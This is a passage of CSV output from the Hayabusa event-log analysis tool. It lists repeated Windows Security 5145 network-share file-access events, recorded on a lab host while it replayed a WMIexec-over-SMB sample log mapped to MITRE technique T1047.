Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
